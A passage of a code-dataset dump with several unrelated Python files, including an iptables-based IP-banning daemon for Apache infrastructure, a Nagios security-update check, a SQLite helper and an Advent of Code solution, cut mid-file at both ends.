restart\n\n\t\t# Try killing the daemon process\n\t\ttry:\n\t\t\twhile 1:\n\t\t\t\tos.kill(pid, signal.SIGTERM)\n\t\t\t\ttime.sleep(0.1)\n\t\texcept OSError as err:\n\t\t\te = str(err.args)\n\t\t\tif e.find(\"No such process\") > 0:\n\t\t\t\tif os.path.exists(self.pidfile):\n\t\t\t\t\tos.remove(self.pidfile)\n\t\t\telse:\n\t\t\t\tprint (str(err.args))\n\t\t\t\tsys.exit(1)\n\n\tdef restart(self):\n\t\t\"\"\"Restart the daemon.\"\"\"\n\t\tself.stop()\n\t\tself.start()\n\n\tdef run(self):\n\t\t\"\"\"You should override this method when you subclass Daemon.\n\n\t\tIt will be called after the process has been daemonized by\n\t\tstart() or restart().\"\"\"\n\n\n\nclass Blocky(Thread):\n\tdef run(self):\n\t\tbaddies = {}\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tjs = json.loads(urllib.urlopen(config.get('aggregator','uri')).read())\n\t\t\t\tfor baddie in js:\n\t\t\t# Got a new one?? :)\n\t\t\t\t\ti = baddie['ip']\n\t\t\t\t\tta = baddie['target']\n\t\t\t\t\tif not i in baddies and (ta == hostname or ta == '*') and not 'unban' in baddie:\n\t\t\t\t\t\tr = baddie['reason'] if 'reason' in baddie else 'Unknown reason'\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t# Check if we already have such a ban in place using iptables -C\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tsubprocess.check_call([\n\t\t\t\t\t\t\t\t\t\"iptables\",\n\t\t\t\t\t\t\t\t\t\"-C\", \"INPUT\",\n\t\t\t\t\t\t\t\t\t\"-s\", i,\n\t\t\t\t\t\t\t\t\t\"-j\", \"DROP\",\n\t\t\t\t\t\t\t\t\t\"-m\", \"comment\",\n\t\t\t\t\t\t\t\t\t\"--comment\",\n\t\t\t\t\t\t\t\t\t\"Banned by Blocky\"\n\t\t\t\t\t\t\t\t\t])\n\t\t\t\t\t\t\t\t# If we reach this point, the rule exists, no need to re-add it\n\t\t\t\t\t\t\texcept subprocess.CalledProcessError as err:\n\t\t\t\t\t\t\t\t# We're here which means the rule didn't exist, so let's add it!\n\t\t\t\t\t\t\t\tsubprocess.check_call([\n\t\t\t\t\t\t\t\t\t\"iptables\",\n\t\t\t\t\t\t\t\t\t\"-A\", \"INPUT\",\n\t\t\t\t\t\t\t\t\t\"-s\", i,\n\t\t\t\t\t\t\t\t\t\"-j\", \"DROP\",\n\t\t\t\t\t\t\t\t\t\"-m\", \"comment\",\n\t\t\t\t\t\t\t\t\t\"--comment\",\n\t\t\t\t\t\t\t\t\t\"Banned by Blocky\"\n\t\t\t\t\t\t\t\t\t])\n\t\t\t\t\t\t\t\tmessage = \"\"\"%s banned %s (%s) - Unban with: sudo iptables -D INPUT -s %s -j DROP -m comment --comment \"Banned by Blocky\"\\n\"\"\" % (hostname, i, r, i)\n\t\t\t\t\t\t\t\tsyslog.syslog(syslog.LOG_INFO, message)\n\t\t\t\t\t\texcept Exception as err:\n\t\t\t\t\t\t\tsyslog.syslog(syslog.LOG_INFO, \"Blocky encountered an error: \" + str(err))\n\t\t\t\t\t\tbaddies[i] = time.time()\n\t\t\t\t\telif (not i in baddies or (i in baddies and (time.time() - baddies[i]) > 1800)) and (ta == hostname or ta == '*') and 'unban' in baddie and baddie['unban'] == True:\n\t\t\t\t\t\tbaddies[i] = time.time()\n\t\t\t\t\t\tr = baddie['reason'] if 'reason' in baddie else 'Unknown reason'\n\t\t\t\t\t\t# Check if we already have such a ban in place using iptables -C\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tsubprocess.check_call([\n\t\t\t\t\t\t\t\t\"iptables\",\n\t\t\t\t\t\t\t\t\"-C\", \"INPUT\",\n\t\t\t\t\t\t\t\t\"-s\", i,\n\t\t\t\t\t\t\t\t\"-j\", \"DROP\",\n\t\t\t\t\t\t\t\t\"-m\", \"comment\",\n\t\t\t\t\t\t\t\t\"--comment\",\n\t\t\t\t\t\t\t\t\"Banned by Blocky\"\n\t\t\t\t\t\t\t\t])\n\t\t\t\t\t\t\t# If we reach this point, the rule exists, and we can remove it\n\t\t\t\t\t\t\tsyslog.syslog(syslog.LOG_INFO, \"Unbanning %s\" % i)\n\t\t\t\t\t\t\tsubprocess.check_call([\n\t\t\t\t\t\t\t\t\"iptables\",\n\t\t\t\t\t\t\t\t\"-D\", \"INPUT\",\n\t\t\t\t\t\t\t\t\"-s\", i,\n\t\t\t\t\t\t\t\t\"-j\", \"DROP\",\n\t\t\t\t\t\t\t\t\"-m\", \"comment\",\n\t\t\t\t\t\t\t\t\"--comment\", \"Banned by Blocky\"\n\t\t\t\t\t\t\t\t])\n\t\t\t\t\t\t\tmessage = \"\"\"From: Blocky \nTo: Apache Infrastructure Root \nReply-To: root@apache.org\nSubject: [Blocky] Unbanned %s on %s.\n\nHi, this is %s.\nI have just unbanned %s on this machine due to leniency\nfrom the Blocky master server.\n\nWith regards,\nBlocky.\n\t\"\"\" % (i, hostname, hostname, i)\n\t\t\t\t\t\t\tsmtpObj = smtplib.SMTP('localhost')\n\t\t\t\t\t\t\tsmtpObj.sendmail(\"blocky@\" + hostname, ['root@apache.org'], message)\n\n\t\t\t\t\t\texcept Exception as err:\n\t\t\t\t\t\t\tpass\n\t\t\t\t\t\tif i in baddies:\n\t\t\t\t\t\t\tdel baddies[i]\n\t\t\t\ttime.sleep(180)\n\t\t\texcept Exception as err:\n\t\t\t\tsyslog.syslog(syslog.LOG_INFO, \"Error while running ban check: %s\" % err)\n\t\t\t\ttime.sleep(180) # Don't loop every 5ms if we hit a snag!\n\n\n\nparser = argparse.ArgumentParser(description='Command line options.')\nparser.add_argument('--user', dest='user', type=str, nargs=1,\n\t\t\t\t\thelp='Optional user to run Blocky as')\nparser.add_argument('--group', dest='group', type=str, nargs=1,\n\t\t\t\t\thelp='Optional group to run Blocky as')\nparser.add_argument('--pidfile', dest='pidfile', type=str, nargs=1,\n\t\t\t\t\thelp='Optional pid file location')\nparser.add_argument('--daemonize', dest='daemon', action='store_true',\n\t\t\t\t\thelp='Run as a daemon')\nparser.add_argument('--stop', dest='kill', action='store_true',\n\t\t\t\t\thelp='Kill the currently running Blocky process')\nargs = parser.parse_args()\n\npidfile = \"/var/run/blocky.pid\"\nif args.pidfile and len(args.pidfile) > 2:\n\tpidfile = args.pidfile\n\ndef main():\n\n\tif args.group and len(args.group) > 0:\n\t\tgid = grp.getgrnam(args.group[0])\n\t\tos.setgid(gid[2])\n\n\tif args.user and len(args.user) > 0:\n\t\tprint(\"Switching to user %s\" % args.user[0])\n\t\tuid = pwd.getpwnam(args.user[0])[2]\n\t\tos.setuid(uid)\n\n\tblocky = Blocky()\n\tblocky.start()\n\n\n## Daemon class\nclass MyDaemon(Daemonize):\n\tdef run(self, args):\n\t\tmain()\n\n# Get started!\nif args.kill:\n\tprint(\"Stopping Blocky\")\n\tdaemon = MyDaemon(pidfile)\n\tdaemon.stop()\nelse:\n\tconfig.read(\"blocky.cfg\")\n\n\tif args.daemon:\n\t\tprint(\"Daemonizing...\")\n\t\tdaemon = MyDaemon(pidfile)\n\t\tdaemon.start(args)\n\telse:\n\t\tmain()\n","repo_name":"jromy5/git-clone-https-github.com-apache-infrastructure-puppet","sub_path":"modules/blocky/files/blocky.py","file_name":"blocky.py","file_ext":"py","file_size_in_byte":7476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"43472868386","text":"def secfun(myarr, i)\t:\n\tfor j in range(3, len(myarr[i])):\t#each element of the line\n\t\t\t\tfor k in range(0, len(myarr)):\t#each line checking again\n\t\t\t\t\tif((len(myarr[k]) != 0) and (len(myarr[i]) != 0)):\n\t\t\t\t\t\tif(myarr[i][j].replace(',','') == myarr[k][0]):\n\t\t\t\t\t\t\tsecfun(myarr, k)\n\t\t\t\t\t\t\tdel myarr[k][:]\n\ndef check(myarr):\n\tfor i in range(0, len(myarr)):\t#each line\n\t\tif(len(myarr[i]) != 0):\n\t\t\tsecfun(myarr, i)\n\n\n\treturn myarr\n\nfstream = open(\"input.txt\", \"r\")\n\nmyarr = []\n\nfor line in fstream:\n\tline = line.split()\n\tmyarr.append(line)\n\nfor i in range(0, len(myarr)):\n\tif(len(myarr[i]) < 3):\n\t\tdel myarr[i][:]\n\nmyarr = [x for x in myarr if x != []]\n\nmyarr = check(myarr)\n\nmyarr = [x for x in myarr if x != []]\n\nfor i in range(0, len(myarr)):\n\tprint(myarr[i])\n\nprint(myarr[0][0])","repo_name":"rounakdatta/aoc-2017","sub_path":"d7/d7p1.py","file_name":"d7p1.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72302344834","text":"import sqlite3\nfrom sqlite3 import Error\nimport os\nimport hashlib\n\n# -------------------------------------------------\n# クラス\n\n# dataファイル情報クラス\n\n\nclass DataFile:\n def __init__(self, id, basename, path=None):\n self.id = id\n self.basename = basename\n self.path = path\n self.graph_png_path = None\n self.graph_html_path = None\n\n def __call__(self, datafile_json):\n try:\n self.id = datafile_json['id']\n self.basename = datafile_json['basename']\n self.path = datafile_json['path']\n except KeyError as e:\n print(e)\n\n return self\n\n def print(self):\n print(self.id, self.basename, self.path,\n self.graph_png_path, self.graph_html_path)\n\n\nclass GraphFile:\n def __init__(self, hash, id_list, path=None):\n self.hash = hash\n self.id_list = id_list\n self.path = path\n\n\n# データ��ァイルリクエストクラス\n# mode=\"READ\" or \"WRITE\",\n# READの場合はid_listかall_flagを指定\nclass READ_DataFile_Request:\n def __init__(self, all_flag=False, id_list=None):\n self.mode = \"READ_DATAFILE\"\n self.all_flag = all_flag\n self.id_list = id_list\n if self.all_flag == False and id_list == None:\n raise ValueError('id_list or all_flag must be specified.')\n\n def __call__(self, cursor):\n if self.all_flag:\n cursor.execute(\"SELECT id, basename, path FROM datafile\")\n else:\n cursor.execute(\"SELECT id, basename, path FROM datafile WHERE id IN ({})\".format(\n ','.join('?'*len(self.id_list))), self.id_list)\n rows = cursor.fetchall()\n datafile_list = []\n for row in rows:\n id, basename, path = row\n datafile = DataFile(id, basename, path)\n datafile_list.append(datafile)\n return datafile_list\n\n\nclass READ_Graph_Request:\n def __init__(self, graph_hash):\n self.mode = \"READ_GRAPH\"\n self.graph_hash = graph_hash\n\n def __call__(self, cursor):\n cursor.execute(\"SELECT * FROM graph WHERE hash=?\", (self.graph_hash,))\n row = cursor.fetchone()\n if row is None:\n return None\n else:\n hash, id_list_str, path = row\n id_list = list(map(int, id_list_str.split()))\n return GraphFile(hash, id_list, path)\n\n\nclass WRITE_Graph_Request:\n def __init__(self, id_list):\n self.mode = \"WRITE_GRAPH\"\n self.id_list = id_list\n self.id_list_str = ' '.join(map(str, sorted(self.id_list)))\n self.hash = None\n self.path = None\n\n def __call__(self, cursor):\n # id_listをソートしてASH-256でハッシュ化\n salt = 'salt0910'\n hash = hashlib.sha1(self.id_list_str.encode(\n 'utf-8') + salt.encode('utf-8')).hexdigest()\n row = cursor.execute(\n \"SELECT * FROM graph WHERE hash=?\", (hash,)).fetchone()\n if row is None:\n cursor.execute(\"INSERT INTO graph (hash, id, path) VALUES (?, ?, ?)\",\n (hash, self.id_list_str, \"None\"))\n self.hash = hash\n return self\n\n\n# -------------------------------------------------\n# モジュール\n\n\n# 情報をDBとやりとり\ndef request_db(db_request):\n conn = None\n\n # Create a database connection to a SQLite database\n conn = sqlite3.connect('server/data/db.sqlite')\n c = conn.cursor()\n contents = db_request(c)\n conn.commit()\n conn.close()\n return contents\n\n\ndef init_db():\n conn = None\n\n # Create a database connection to a SQLite database\n conn = sqlite3.connect('server/data/db.sqlite')\n c = conn.cursor()\n\n # テーブルが既に存在していれば削除\n c.execute(\"DROP TABLE IF EXISTS datafile\")\n\n # datafileテーブルを作成\n c.execute('''CREATE TABLE datafile\n (id INTEGER PRIMARY KEY AUTOINCREMENT,\n basename TEXT NOT NULL,\n path TEXT)''')\n\n # data/ディレクトリ内のCSVファイルを検索してデータを挿入\n data_dir = 'server/data/csv'\n for filename in os.listdir(data_dir):\n if filename.endswith('.csv'):\n basename = os.path.splitext(filename)[0]\n path = os.path.join(data_dir, filename)\n c.execute(\n \"INSERT INTO datafile (basename, path) VALUES (?, ?)\", (basename, path))\n\n # テーブルが既に存在していれば削除\n c.execute(\"DROP TABLE IF EXISTS graph\")\n\n # graphテーブルを作成\n # hash:文字列、id:整数のリスト、path:グラフ画像のパス\n c.execute('''CREATE TABLE graph\n (hash TEXT PRIMARY KEY,\n id TEXT NOT NULL,\n path TEXT)''')\n\n # 変更をコミットする\n conn.commit()\n\n \"\"\"\n # 結果を表示\n c.execute(\"SELECT * FROM datafile\")\n rows = c.fetchall()\n for row in rows:\n print(row)\n \"\"\"\n\n conn.close()\n\n\nif __name__ == '__main__':\n init_db()\n datafile_list = request_db(READ_DataFile_Request(all_flag=True))\n for datafile in datafile_list:\n datafile.print()\n","repo_name":"sento-02/plot-webapp","sub_path":"server/app/utils/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"20788547555","text":"'''\nAs the name suggests, the main function. Initializes the model, controller, and view.\nMain then launches the view which in this case is a text gui.\n'''\n\nfrom .model.model import Model\nfrom .controller.controller import Controller\nfrom .view.view import View\nfrom .misc import Misc\n\ndef main(address_space, requirements=None):\n _mod = Model(address_space) #sending address block to model\n ctrl = Controller(_mod)\n view = View(ctrl)\n\n if(requirements != None): #checking if requirements argument was passed\n for name, hosts in requirements:\n ctrl.add_new_subnet(hosts, name, True)\n\n print()\n Misc.welcome_banner()\n view.text_gui.run()\n","repo_name":"notarobot767/IT384_subnet_project","sub_path":"subnet_package/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25133564609","text":"#!/usr/bin/env python3\n\"\"\" Nagios check for security updates\n\nRequirements\n Python >= 3.8\n\nThis program is free software: you can redistribute it and/or modify it under\nthe terms of the GNU General Public License as published by the Free Software\nFoundation, either version 3 of the License, or (at your option) any later\nversion.\n\nThis program is distributed in the hope that it will be useful, but WITHOUT\nANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\nFOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.\nYou should have received a copy of the GNU General Public License along with\nthis program. If not, see .\n\"\"\"\nimport argparse\nimport csv\nimport logging\nimport re\nimport sys\n\nfrom datetime import date, datetime, timedelta\nfrom subprocess import run, TimeoutExpired, PIPE\nfrom typing import Match, Union, Tuple\n\n__license__ = \"GPLv3\"\n__version__ = \"0.1\"\n\n# Nagios return codes: https://nagios-plugins.org/doc/guidelines.html#AEN78\nOK = 0\nWARNING = 1\nCRITICAL = 2\nUNKNOWN = 3\nreturn_codes = ['OK', 'WARNING', 'CRITICAL', 'UNKNOWN']\nDEBUG = False\n\n# Global logging object\nlogger = logging.getLogger(__name__)\n\n\ndef parseargs() -> argparse.Namespace:\n \"\"\" Parse command-line arguments \"\"\"\n parser = argparse.ArgumentParser(description='Nagios check for security updates')\n parser.add_argument(\n '-v', '--verbose', required=False,\n help='enable verbose output', dest='verbose',\n action='store_true')\n parser.add_argument(\n '-d', '--debug', required=False,\n help='enable debug output', dest='debug',\n action='store_true')\n parser.add_argument(\n '-k', '--kernel', required=False,\n help='ommit kernel patches (if kernel live patches are enabled)', dest='nokernel',\n action='store_true')\n parser.add_argument(\n '-c', '--cache', required=False, default='/tmp/check-security-updates.cache',\n help='local cache file for patch dates (default: /tmp/check-security-updates.cache)', dest='cache',\n action='store_true')\n parser.add_argument('-V', '--version', action='version', version='%(prog)s ' + __version__)\n\n args = parser.parse_args()\n return args\n\n\nclass Firmware:\n def __init__(self, model:str = \"Dell\", servicetag = \"\"):\n self.model = model\n self.servicetag = servicetag\n\n # Local firmware versions\n self.bios_version = \"\"\n self.bmc_version = \"\"\n self.lifecycle_version = \"\"\n\n # Available firmware versions online\n self.bios_online = []\n self.bmc_online = []\n self.lifecycle_online = []\n\n def get_localfw(self):\n \"\"\"Retrieve list of local firmware versions currently installed on the system\"\"\"\n pass\n\n def get_onlinefw(self) -> bool:\n \"\"\"Retrieve list of available firmware versions online\"\"\"\n urls = {\"Dell\": \"\"}\n\n if self.servicetag == \"\":\n return False\n\n def check(self) -> bool:\n \"\"\"Compare local to online firmware\"\"\"\n pass\n\n\nclass Updates:\n def __init__(self, cache_file:str, nokernel: bool=False):\n self.rc = -1\n self.critical = {}\n self.important = {}\n self.moderate = {}\n self.low = {}\n self.cache_file = cache_file\n self.nokernel = nokernel\n self.next_patchdate = None\n self.expired = False\n\n def run(self, cmd: list, verbose: bool=False):\n \"\"\"List security updates and return result\"\"\"\n output = \"\"\n\n try:\n logger.debug(f'Running OS command line: {cmd} ...')\n process = run(cmd, check=True, timeout=60, stdout=PIPE)\n self.rc = process.returncode\n output = process.stdout.decode('utf-8').splitlines()\n except (TimeoutExpired, ValueError) as e:\n logger.warning(f'{e}')\n sys.exit(UNKNOWN)\n except FileNotFoundError as e:\n logger.critical(f\"CRITICAL: Missing program {cmd[0] if len(cmd) > 0 else ''} ({e})\")\n sys.exit(CRITICAL)\n except Exception as e:\n logger.critical(f'CRITICAL: {e}')\n sys.exit(CRITICAL)\n\n for line in output:\n expiration_date = None\n expired = None\n\n # Omit kernel patches\n m = re.search(r\"/Sec.\\s*(kernel.*)\", line)\n if m and self.nokernel:\n if verbose:\n logger.info(f\"Skipping {m.group(1)}\")\n continue\n\n # Always warn about these packages\n pkgs = \"(firefox.*|chrom.*)\"\n m = re.search(f\"\\s*{pkgs}\", line)\n if m:\n logger.debug(line)\n self.critical[\"Critical/Sec. \" + m.group(0).strip()] = datetime.today().strftime(\"%Y-%m-%d\")\n continue\n\n # Critical patches\n m = re.search(r\"Critical/Sec.\\s*(.*)$\", line)\n if isinstance(m, Match):\n (expired, expiration_date) = self.check_expired(line, 30)\n logger.debug(line)\n self.critical[m.group(0)] = expiration_date\n\n # Important patches\n m = re.search(r\"Important/Sec.\\s*(.*)$\", line)\n if isinstance(m, Match):\n (expired, expiration_date) = self.check_expired(line, 90)\n logger.debug(line)\n self.important[m.group(0)] = expiration_date\n\n # Moderate patches\n m = re.search(r\"Moderate/Sec.\\s*(.*)$\", line)\n if isinstance(m, Match):\n (expired, expiration_date) = self.check_expired(line, 90)\n logger.debug(line)\n self.moderate[m.group(0)] = expiration_date\n\n # Low patches\n m = re.search(r\"Low/Sec.\\s*(.*)$\", line)\n if isinstance(m, Match):\n (expired, expiration_date) = self.check_expired(line, 90)\n logger.debug(line)\n self.low[m.group(0)] = expiration_date\n\n if expired:\n self.expired = True\n\n if expiration_date:\n if not self.next_patchdate:\n self.next_patchdate = expiration_date\n else:\n if self.next_patchdate > expiration_date:\n self.next_patchdate = expiration_date\n\n if verbose:\n # Critical\n for patch_name, expiration_date in sorted(self.critical.items(), key=lambda item: item[1] if item[1] is not None else datetime.today().date()):\n if expiration_date is None:\n expiration_date = \"- \"\n logger.info(f\"Patch until {expiration_date} {patch_name}\")\n # Important\n for patch_name, expiration_date in sorted(self.important.items(), key=lambda item: item[1] if item[1] is not None else datetime.today().date()):\n if expiration_date is None:\n expiration_date = \"- \"\n logger.info(f\"Patch until {expiration_date} {patch_name}\")\n # Medium\n for patch_name, expiration_date in sorted(self.moderate.items(), key=lambda item: item[1] if item[1] is not None else datetime.today().date()):\n if expiration_date is None:\n expiration_date = \"- \"\n logger.info(f\"Patch until {expiration_date} {patch_name}\")\n # Low\n for patch_name, expiration_date in sorted(self.low.items(), key=lambda item: item[1] if item[1] is not None else datetime.today().date()):\n if expiration_date is None:\n expiration_date = \"- \"\n logger.info(f\"Patch until {expiration_date} {patch_name}\")\n\n logger.info(f\"Next patch date: {self.next_patchdate}\")\n\n def create_output(self) -> Tuple[int, str]:\n \"\"\"Verify result and return output in Nagios format\"\"\"\n if self.rc >= 0:\n result = OK\n else:\n return UNKNOWN, f'{return_codes[UNKNOWN]}'\n\n if self.expired and (len(self.important) > 0 or len(self.moderate) > 0 or len(self.low) > 0):\n result = WARNING\n if len(self.critical) > 0:\n result = CRITICAL\n\n msg = f'{return_codes[result]}: Critical={len(self.critical)} Important={len(self.important)} ' \\\n f'Moderate={len(self.moderate)} Low={len(self.low)} next_patch_date={self.next_patchdate}'\n perfdata = f'Critical={len(self.critical)};' \\\n f'Important={len(self.important)};' \\\n f'Moderate={len(self.moderate)};' \\\n f'Low={len(self.low)};'\n\n message = f'{msg}|{perfdata}'\n logger.debug(message)\n return result, message\n\n def check_expired(self, line:str, days_limit: int) -> Tuple[bool, Union[datetime.date,None]]:\n \"\"\"Check if time frame for update has expired\"\"\"\n output = \"\"\n expiration_date = None\n\n m = re.match(r\"([^\\s]+)\\s\", line)\n if m:\n logger.debug(f\"{line}\")\n patch = m.group(0).strip()\n\n # Check if patch is already in local cache\n is_cached, patch_date = self.check_cache(patch)\n if is_cached:\n logger.debug(f\"Local cache: {patch} {patch_date}\")\n else:\n # Retrieve patch info online\n cmd = [\"yum\", \"updateinfo\", \"info\", f\"{patch}\"]\n try:\n logger.debug(f'Running OS command line: {cmd} ...')\n process = run(cmd, check=True, timeout=60, stdout=PIPE)\n self.rc = process.returncode\n output = process.stdout.decode('utf-8').splitlines()\n except (TimeoutExpired, ValueError) as e:\n logger.warning(f'{e}')\n sys.exit(UNKNOWN)\n except FileNotFoundError as e:\n logger.critical(f\"CRITICAL: Missing program {cmd[0] if len(cmd) > 0 else ''} ({e})\")\n sys.exit(CRITICAL)\n except Exception as e:\n logger.critical(f'CRITICAL: {e}')\n sys.exit(CRITICAL)\n \n # Write patch date to cache file\n m2 = None\n for info_line in output:\n #logger.debug(f\"{info_line}\")\n m2 = re.match(r\"\\s*(Updated|Issued)\\s*:\\s*(\\d+-\\d+-\\d+ \\d+:\\d+:\\d+)\", info_line)\n if m2:\n patch_date = datetime.strptime(m2.group(2), \"%Y-%m-%d %H:%M:%S\").date()\n if self.update_cache(patch, patch_date):\n logger.debug(f\"Local cache updated: {patch} {patch_date}\")\n break\n\n if m2 is None:\n if self.update_cache(patch, None):\n logger.debug(f\"Local cache updated: {patch} None\")\n\n # Calculate expiration date after which patch has to be installed\n if patch_date is not None:\n expiration_date = patch_date + timedelta(days_limit)\n if date.today() >= expiration_date:\n logger.debug(f\"Timeframe to patch has expired: {expiration_date} (more than {days_limit} days ago)\")\n return True, expiration_date\n else:\n logger.debug(f\"patch_date={patch_date} days_limit={days_limit} (patch before {patch_date + timedelta(days_limit)})\")\n else:\n logger.error(f\"Patch line has wrong format: {line}\")\n\n return False, expiration_date\n\n def check_cache(self, patch:str) -> Tuple[bool, Union[datetime.date, None]]:\n '''Check local cache for patch release date'''\n try:\n with open(self.cache_file) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n for row in csv_reader:\n if row[0] == patch:\n if row[1] != \"None\":\n return (True, datetime.strptime(row[1], \"%Y-%m-%d\").date())\n else:\n return (True, None)\n except Exception:\n pass\n\n return (False, None)\n\n def update_cache(self, patch:str, patch_date: Union[datetime.date, None]) -> bool:\n '''Insert patch release date in local cache'''\n patch_date_str = patch_date.strftime(\"%Y-%m-%d\") if patch_date else \"None\"\n\n try:\n with open(self.cache_file, mode='a') as csv_file:\n patch_writer = csv.writer(csv_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n patch_writer.writerow([patch, patch_date_str])\n except Exception as e:\n logger.error(f\"Error writing cache file {self.cache_file}: {e}\")\n return False\n\n return True\n\n def clean_cache(self) -> bool:\n '''Delete patch information from cache file that is older than 1 year'''\n patches = {}\n\n # Read cache file\n try:\n with open(self.cache_file) as csv_file:\n csv_reader = csv.DictReader(csv_file, delimiter=',', fieldnames=['patch_name', 'patch_date'])\n for row in csv_reader:\n patches[row['patch_name']] = row['patch_date']\n except Exception as e:\n logger.error(f\"Read error while cleaning cache file {self.cache_file}: {e}\")\n return False\n\n # Write new cache file, sorted by patch date (newest first)\n # Patches older than 1 year are ignored\n try:\n with open(self.cache_file, mode='w') as csv_file:\n patch_writer = csv.writer(csv_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n for patch_name, patch_date in sorted(patches.items(), key=lambda kv: kv[1] if kv[1] is not None else datetime.today().date(), reverse=True):\n try:\n dx = datetime.today() - datetime.strptime(patch_date, \"%Y-%m-%d %H:%M:%S\")\n except ValueError:\n dx = timedelta(0)\n\n if dx.days < 365:\n patch_writer.writerow([patch_name, patch_date])\n else:\n logger.debug(f\"Removing from cache file: {patch_name} {patch_date}\")\n except Exception as e:\n logger.error(f\"Write error while cleaning cache file {self.cache_file}: {e}\")\n return False\n\n return True\n\n\nclass LogFilterWarning(logging.Filter):\n \"\"\"Logging filter >= WARNING\"\"\"\n def filter(self, record):\n return record.levelno in (logging.DEBUG, logging.INFO, logging.WARNING)\n\n\ndef get_logger(debug: bool = False) -> logging.Logger:\n \"\"\"Retrieve logging object\"\"\"\n if debug:\n logger.setLevel(logging.DEBUG)\n else:\n logger.setLevel(logging.INFO)\n\n # Log everything >= WARNING to stdout\n h1 = logging.StreamHandler(sys.stdout)\n h1.setLevel(logging.DEBUG)\n h1.setFormatter(logging.Formatter(fmt='%(asctime)s [%(process)d] %(levelname)s: %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S'))\n h1.addFilter(LogFilterWarning())\n\n # Log errors to stderr\n h2 = logging.StreamHandler(sys.stderr)\n h2.setFormatter(logging.Formatter(fmt='%(asctime)s [%(process)d] %(levelname)s: %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S'))\n h2.setLevel(logging.ERROR)\n\n logger.addHandler(h1)\n logger.addHandler(h2)\n\n return logger\n\n\ndef main():\n \"\"\"Main program flow\"\"\"\n result = OK\n\n args = parseargs()\n get_logger(args.debug)\n\n # Retrieve list of available Linux updates\n updates = Updates(args.cache, True if args.nokernel else False)\n updates.run(['yum', 'updateinfo', 'list'], args.verbose)\n result, message = updates.create_output()\n print(message)\n\n # Clean old entries from cache file\n updates.clean_cache()\n\n exit(result)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"groland11/nagios-check-security-updates","sub_path":"check-security-updates.py","file_name":"check-security-updates.py","file_ext":"py","file_size_in_byte":16044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"500949594","text":"from ga_machine import *\n\n# UNBOUND KNAPSACK\n\n\nGA3 = GA(pop_size=500, mutation_rate=0.1, fit=knap_fitness, gene_factory=knap_gene_factory, indiv_factory=knap_individual_factory,\n termination_condition=lambda i: i == 10, number_of_genes=KNAP_NUMBER_OF_GENES, is_crossover=True)\npop, list_fitness = GA3.run()\n\n# Plot best, worst and average fitness per epoch\nplt.figure()\nepochs = list(range(1, GA3.generations() + 1))\nplt.plot(epochs, GA3.get_best_fitness())\nplt.plot(epochs, GA3.get_worst_fitness())\nplt.plot(epochs, GA3.get_average_fitness())\nplt.title('Fitness per epoch')\nplt.xlabel('Epoch number')\nplt.ylabel('Fitness')\nplt.legend(('Best Fitness', 'Worst Fitness', 'Average Fitness'))\nplt.savefig('Genetic Algorithms Problems/fitness.png')","repo_name":"tami2293/CC5114","sub_path":"Genetic Algorithms Problems/fitness_plot.py","file_name":"fitness_plot.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"39203168445","text":"#!/usr/bin/env python3\n\nimport os,sys\n# append base path to sys.path\nrunpath = os.path.dirname(os.path.realpath(__file__))\napproot = os.path.abspath(os.path.join(runpath, os.pardir))\nsys.path.append(os.path.join(runpath,'..'))\nsys.path.append(approot)\nimport lib.shm as shm\n\n\nclass RunModule():\n def __init__(self,module_name):\n self.name = module_name\n self.module = self.__get_module()\n def __get_module(self):\n for m in shm.loaded_modules:\n if m.module_id == self.name:\n return m\n def run(self,args=''):\n if self.module:\n return self.module.run(args)","repo_name":"IsaPeter/PythonProjects","sub_path":"phoenix/lib/phoenixlibs.py","file_name":"phoenixlibs.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"37403865232","text":"#!/usr/bin/env python\n# This program is dedicated to the public domain under the CC0 license.\n# pylint: disable=import-error,wrong-import-position\n\"\"\"\nSimple example of a bot that uses a custom webhook setup and handles custom updates.\nFor the custom webhook setup, the libraries `starlette` and `uvicorn` are used. Please install\nthem as `pip install starlette~=0.20.0 uvicorn~=0.17.0`.\nNote that any other `asyncio` based web server framework can be used for a custom webhook setup\njust as well.\n\nUsage:\nSet bot token, url, admin chat_id and port at the start of the `main` function.\nYou may also need to change the `listen` value in the uvicorn configuration to match your setup.\nPress Ctrl-C on the command line or send a signal to the process to stop the bot.\n\"\"\"\nimport asyncio\nimport logging\nfrom dataclasses import dataclass\nfrom http import HTTPStatus\nimport os\n\nimport uvicorn\nfrom starlette.applications import Starlette\nfrom starlette.requests import Request\nfrom starlette.responses import PlainTextResponse, Response\nfrom starlette.routing import Route\n\nfrom telegram import __version__ as TG_VER\nfrom get_exam_schedule import get_exam_schedule\ntry:\n from telegram import __version_info__\nexcept ImportError:\n __version_info__ = (0, 0, 0, 0, 0) # type: ignore[assignment]\n\nif __version_info__ < (20, 0, 0, \"alpha\", 1):\n raise RuntimeError(\n f\"This example is not compatible with your current PTB version {TG_VER}. To view the \"\n f\"{TG_VER} version of this example, \"\n f\"visit 